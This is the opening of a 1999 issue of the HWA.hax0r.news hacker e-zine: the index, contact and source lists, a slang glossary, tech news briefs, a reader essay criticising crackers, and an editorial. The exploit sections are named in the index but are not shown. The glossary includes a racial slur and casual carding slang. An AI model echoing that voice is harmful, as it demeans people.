Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / HWA-hn9.txt < prev next >

Wrap

Text File | 1999-03-24 | 212.6 KB | 5,047 lines

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 9 Volume 1 1999 March 13th 99 ========================================================================== Are you running WindowsNT and still under the illusion that it is secure? ``A couple of freelance writers are working on a story for us about security auditing and protection. As part of their "research," they decided to see if they could hack into one of our lab networks. It took them only a few hours to successfully break into our Windows NT boxes. And from there, they learned the configuration of our lab networks, the server names and functions, the operating systems we run and most of the passwords on the key accounts on our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a good many of our routers and switches.'' - From NetworkWeek, Story in section 10.0 Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #9 =-----------------------------------------------------------------------= "I'm doing the BEST I can so don't give me any SHIT" - Seen on a button worn by `Ed'.. ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** ******************************************************************* =-------------------------------------------------------------------------= Issue #9 Empirical knowledge is power =--------------------------------------------------------------------------= inet.d THIS b1lly the llammah ________ ------- ___________________________________________________________ |\____\_/[ INDEX ]__________________________________________________________/| | | || | | Key Content || \|_________________________________________________________________________/ 00.0 .. COPYRIGHTS 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC 00.2 .. SOURCES 00.3 .. THIS IS WHO WE ARE 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'? 00.5 .. THE HWA_FAQ V1.0 \__________________________________________________________________________/ 01.0 .. Greets 01.1 .. Last minute stuff, rumours, newsbytes 01.2 .. Mailbag 02.0 .. From the editor 02.1 .. Demoniz trashcans his webboard 03.0 .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse 03.1 .. The FPSC-IRCD.txt advisory. 04.0 .. Pentagon under attack (again) 04.1 .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange. 04.2 .. New Backdoor found: Default passwords in Bay networks switches 04.3 .. ISAPI exploit code 04.4 .. Winfreez.c new exploit code for win9x and NT 04.5 .. Unknown Zone: Windows intra/inter net zone difficulties 04.6 .. Sniffing out MS Security glitch 05.0 .. Linux TCP flaw exploit code for Linux 2.0.35 and older. (includes Solaris version) 06.0 .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit 07.0 .. New Computer Technology Makes Hacking a Snap - Washington Post 08.0 .. Korean "Superhacker" a national resource... 09.0 .. The l0pht and NFR team up to produce top flight IDS 10.0 .. A good example of how 'Secure' NT really is 11.0 .. CON: The Black Hat Briefings Security Conference 12.0 .. CON: CQRE [Secure] Congress and Exhibition 13.0 .. CON: can't afford $2k? check out Canc0n99 security Conference 14.0 .. CON: Countering cyberterrorism AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. H.W .. Hacked Websites A.0 .. APPENDICES A.1 .. PHACVW linx and references ____________________________________________________________________________ |\__________________________________________________________________________/| | | || | | || \|_________________________________________________________________________|/ @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!* News (New site unconfirmed).......http://cnewz98.hypermart.net/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) BEST-OF-SECURITY Subscription Info. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _/_/_/ _/_/ _/_/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ Best Of Security "echo subscribe|mail best-of-security-request@suburbia.net" or "echo subscribe|mail best-of-security-request-d@suburbia.net" (weekly digest) For those of you that just don't get the above, try sending a message to best-of-security-request@suburbia.net with a subject and body of subscribe and you will get added to the list (maybe, if the admin likes your email). Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe, visit http://www.counterpane.com/unsubform.html.á Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.á He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09 ááááá ááááááááááááááááááááá ISSNá 1004-042X áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu) áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) áááááá Archivist: Brendan Kehoe áááááá Poof Reader:áá Etaion Shrdlu, Jr. áááááá Shadow-Archivists: Dan Carosone / Paul Southworth ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala ááááááááááááááááááááááááá Ian Dickinson áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ "If all it takes is a million monkeys banging on keyboards then how come AOL hasn't turned out any Shakespeare yet??" - Anon. Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "When i'm 21 i'm going to change my name to 'Anonymous' and claim royalties for all the editorials written and attributed to my name." - Anonymous Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ BORED? You may be interested in this... http://www.patents.ibm.com/details?patent_number=5501650 if that isn't quite your erh speed, then you can always check out http://www.hamsterdance.com/ for a laugh I enjoyed it ...the graphics are most amusing. ++ SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO? Contributed by FProphet source: Betanews.com And you thought it was just you. Betanews.com (www.betanews.com) reports that Microsoft has acknowledged a new bug discovered in Windows that locksa machine after 49.7 days of consecutive usage. A fix is available now, and is expected to appear in the forthcoming Windows 98 service release update, currently expected to be released in April. Microsoft's Personal Support Center has details. ++ INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE Mar 11th Contributed by Ed Intel released a program that allows the user to turn off the serial number of their new Pentium III chip, but Zero-Knowledge Systems claims it has developed an exploit which will retrieve the serial number wether the feature is turned on or off. I don't have one of these chips to test this out on so can't confirm or deny this report. ++ BANK PLAN FOES LINE UP http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html Opponents of "Know Your Customer," a controversial plan by the government to monitor individuals' banking activities, will make their case on Capitol Hill. By Declan McCullagh. ++ DELL TO BUY BOATLOAD FROM IBM http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html Dell will buy about US$16 billion of chips, drives, and monitors from IBM during the next seven years. It's a nice boost to both companies. ++ CANADIAN TELECOM BEHEMOTH BORN http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html ++ AT&T Canada buys regional phone firm Metronet communications in US$4.6 billion deal. ++ EUROPEAN TELECOMS: BUY, BUY, BUY http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html France's Alcatel agrees to buy another California Internet company for US$350 million. And Germany's Seimens is expected to spend $US1.7 billion on US data-networking firms. ++ IT'S A LINUXWORLD AFTER ALL http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html This week's conference is turning a tightknit community into an international phenomenon. Not all of the new industry stars are ready for the spotlight. Polly Sprenger reports from San Jose, California. ++ LINUX GETS OPEN-SOURCE GUI http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html Thanks to an interface lift, Linux is ready to star on the desktop. GNOME marries components from familiar windowing environments and adds a few things of its own. Leander Kahney reports from San Jose, California. ++ NIPPING AT THE HEELS OF MP3 http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html When high tech does battle on the Net, it's not always the best tech that wins. This is the lesson that a smaller, faster digital music format is learning in the face of MP3. By Christopher Jones. ++ TURNING DATA INTO DOLLARS http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html PeopleSoft stores information on about 30 million employees worldwide. Now the company is looking to generate e-business from its data banks, a plan that's raising eyebrows. By Joanna Glasner. ++ FROM COMDEX TO VENICE http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html The creator of one of the world's biggest computer-trade shows builds the world's most high-tech hotel. Vince Beiser reports from Las Vegas. ++ NO TIME FOR PAIN http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html A new therapy using electric current reduces chronic back pain, according to a study in the Journal of the American Medical Association. By Kristen Philipkoski. ++ MONICA'S BIO, BYTE BY BYTE http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html Monica's Story, the Lewinsky memoir hitting bookstores on Thursday, will be the first book published simultaneously in e-book and paper form. By Steve Silberman. ++ BIG INSIDER SALES AT YAHOO http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html Executives sold close to a million shares in February. Analysts say this could be a red flag. By Jennifer Sullivan. ++ SENATE HEARS Y2K LIABILITY ACT http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html Two senators introduce the latest legislation to head off a raft of Year 2000 lawsuits arising from failed computer systems. By Heidi Kriz. ++ BRITS ON NET: JOLLY GOOD http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html Ten thousand new Britons log on each day, a new poll reveals. German newbies nip close at their their heels, but France has a ways to go. ++ KING FOR THE DOMAINS IN SIGHT http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html The Internet Corporation for Assigned Names and Numbers finalizes proposals that will lay down the law on .com -- as well as .biz, .xxx, and other future top-level domains. By Chris Oakes. ++ GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html Older investors looking to retire should stay away from Internet stocks, the Federal Reserve chairman tells Congress. ++ CLINTON TABS PRIVACY POINT MAN (POL. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html An Ohio State law professor will represent the administration's views concerning online privacy, an issue which gains a little more momentum every day. By Declan McCullagh and James Glave. ++ MUSIC INDUSTRY PLANS DVD AUDIO http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html Record companies and technology companies agree on a copy-protection framework for the successor to CDs. DVD Audio is finally ready for consumers. By Christopher Jones. ++ DELL MORPHS INTO A RETAILER http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html The world's biggest direct seller of PCs hopes to become a big online seller of consumer electronics too. Wednesday, it launched its own online superstore. ++ LINUX, MEET OPERA http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html Fans of Linux and Opera, which have both built support by taking on the bigwigs, can now run the underdog browser on the underdog OS. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG ~~~~~~~ Lots of mail, not much for sharing here though ... keep the letters coming! but don't forget to include something I can print too... ;) . . . . . . . // Written by NUL (If you don't know, don't ask) // http://come.to/hexx (UnderConstruction) // jeanclaude@canada.com // 99/03/11 #include <If you want to, you can.> To start this off I would like to make one thing abundantly clear: I do not consider myself a hacker. I'm more interested in programing than anything else. Sure, I've toiled a bit, but I cannot be considered as one of the El33t. The reason for which I am writing this little article is to try to place a bit of clairity on the reasons for hacking / cracking (or at least trying to make sence of them). /* */ Hacking, the original motto was to do no damage, but as time went by and people develloped new skills, they decided that the original motto no longer applied to them. Thus the cracker was born. Hacking and Cracking are two different entities. You can not be both at the same time. You are either one or the other. (For those of you who consider youselves as hackers or crackers but use other peoples' scirpts to hack/crack, you are neither. Anybody can point and click their way along or run a programe which does all the work for you, it doesn't require any talent.) There are a few things that I find pointless in what the cracker community is doing: First off: What the hell is the point of saying a server's security is shit if you don't help the server fix it??? What? Hack into it a second time? (I know there are a few groups out there who actually do help the servers they crack. This part doesn't concern you.) Second: Why the hell do people think that they are Eleet when they use a script to determine what systems are vulnerable? And exploit that vulnerability. Just because you know one or two tricks doesn't make you anything. Third: & what the hell is the point of writing in Eleet text? It's all fine and dandy if you can't spell, but please, half the time you sound like you never got a high school education! Power can only corrupt. Crackers who devellope thier skills eventually loose control (though this isn't true for everybody) they can't help but feel destructive. Though there are different levels of destructiveness (as I see it): A: Destroying all information, just for the heck of it. B: Destributing information / programs to ruin a business. C: Defacing information. D: Replacing information, but leaving a back-up copy. E: Destroying all information, for good purposes. The last one (E) does fall into the category of cracking because it still is vandalisment of information even though it's for a good purpose (Cracking the KKK server(s) and destroying everything would be considered a class E). Ok, ok I know... This did kindof turn out to be a bit differently then what it was supposed to be, but still I think I did manage to get a small message accross... // EOF Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and tattooman among others .. @HWA 02.0 From the editor.#9 ~~~~~~~~~~~~~~~~~~ #include <stdio.h> #include <thoughts.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* * Blech, fuck snow ... and overclocked chips that can't take the *heat even with oversize fans and sinks duct taped to them ... ;) * *Moving right along, thanks for the continued support everyone and tty next time... */ printf ("EoF.\n"); } w00t w00t w00t! ... w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk. 1. A transcursion or transcendance into joy from an otherwise inert state 2. Something Cruciphux can't go a day without typing on Efnet Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, 